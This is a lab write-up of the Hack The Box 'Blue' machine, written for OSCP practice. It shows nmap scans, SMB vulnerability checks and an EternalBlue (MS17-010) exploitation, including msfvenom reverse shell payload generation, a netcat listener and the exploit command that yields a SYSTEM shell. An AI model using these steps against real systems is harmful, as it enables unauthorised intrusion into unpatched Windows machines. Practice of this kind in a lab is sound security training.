Hack The Box: Blue Write-up (#30)

This is my 30th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.40
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535

We get the back the following result:

  • Port 139: — Running netbios-ssn service
  • Port 445: — Running samba service
  • Port 135,49152,49153,49154,49155,49156,49157: — Running Windows RPC
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.0099s latency).
Scanned at 2020-08-29 18:17:03 +08 for 111s
Not shown: 65526 closed ports
Reason: 65526 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
...SNIP...
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26781/tcp): CLEAN (Couldn't connect)
| Check 2 (port 12383/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19006/udp): CLEAN (Failed to receive data)
| Check 4 (port 60195/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:18:49+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-29T10:18:51
|_ start_date: 2020-08-29T10:16:53
...

For UDP scan, I scanned for top 20 ports with “ — top-ports” flag because I already rooted this box while it was still running.

nmap -sU -O --top-ports=20 -oA nmap/udp 10.10.10.40
  • -sU: UDP scan

We get back the following results, where all ports are either closed or filtered.

Nmap scan report for 10.10.10.40
Host is up, received user-set (0.011s latency).
Scanned at 2020-08-29 18:17:03 +08 for 329s
PORT STATE SERVICE REASON VERSION
53/udp closed domain port-unreach ttl 127
67/udp closed dhcps port-unreach ttl 127
68/udp closed dhcpc port-unreach ttl 127
69/udp closed tftp port-unreach ttl 127
123/udp closed ntp port-unreach ttl 127
135/udp closed msrpc port-unreach ttl 127
137/udp open|filtered netbios-ns no-response
138/udp open|filtered netbios-dgm no-response
139/udp closed netbios-ssn port-unreach ttl 127
161/udp closed snmp port-unreach ttl 127
162/udp closed snmptrap port-unreach ttl 127
445/udp closed microsoft-ds port-unreach ttl 127
500/udp open|filtered isakmp no-response
|_ike-version: ERROR: Script execution failed (use -d to debug)
514/udp closed syslog port-unreach ttl 127
520/udp closed route port-unreach ttl 127
631/udp closed ipp port-unreach ttl 127
1434/udp closed ms-sql-m port-unreach ttl 127
1900/udp closed upnp port-unreach ttl 127
4500/udp open|filtered nat-t-ike no-response
49152/udp closed unknown port-unreach ttl 127
Too many fingerprints match this host to give specific OS details
...

So it is obvious, the only chance to get an initial foothold is by exploiting SMB service.

Service Enumeration

Let’s run Nmap vuln scan for this service.

nmap --script smb-vuln* -p139,445 -oA smb-vuln-scan.nmap 10.10.10.40

We get back the following results.

Nmap SMB vuln scan

As I expected, this box is vulnerable to CVE-2017–0143. The vulnerability we’ll be exploiting is called EternalBlue. Exploiting this vulnerability will give us SYSTEM shell as we did for the Legacy box.

Before we proceed to the exploitation phase, let’s run one more scan to find out OS version with “smb-os-discovery” script.

nmap --script smb-os-discovery -p139,445 -oA OS-Discobvery 10.10.10.40
...SNIP...
Nmap scan report for 10.10.10.40
Host is up (0.0086s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:21:56+01:00

It is Windows 7 Professional SP1.

Exploitation

  1. Download exploit code from GitHub.
  2. Create MSFvenom reverse shell payload.
  3. Run the exploit.

We do the same but more to automated way for reverse shell payload segment. Let’s clone this GitHub repo.

git clone https://github.com/lokendrasinghrawat/AutoBlue-MS17-010.git

Run the following shell script to generate a reverse shell payload.

root@kali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh

Make sure you provide the following options (in bold) when asking for your input to generate only regular reverse shell payload and not a meterpreter payload:

kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.10
LPORT you want x64 to listen on:
53
LPORT you want x86 to listen on:
8080
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=53
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE

Once done, the script it will merge kernel payload and our reverse shell payload into one file separated with 32-bit and 64-bit architectures. We’ll use sc_x64.bin payload to exploit.

Now, set a Netcat listener on port 53.

nc -nlvp 53

Run the exploit for Windows 7(in bold).

root@kali:/opt/AutoBlue-MS17-010# pwd
/opt/AutoBlue-MS17-010
python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin

We get a SYSTEM reverse shell!

SYSTEM reverse shell

Grab the user.txt flag.

user.txt flag

Grab the root.txt flag.

root.txt flag

Attack Strategy Map

Strategy Map

Thank you for reading :-) Next box is Devel.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.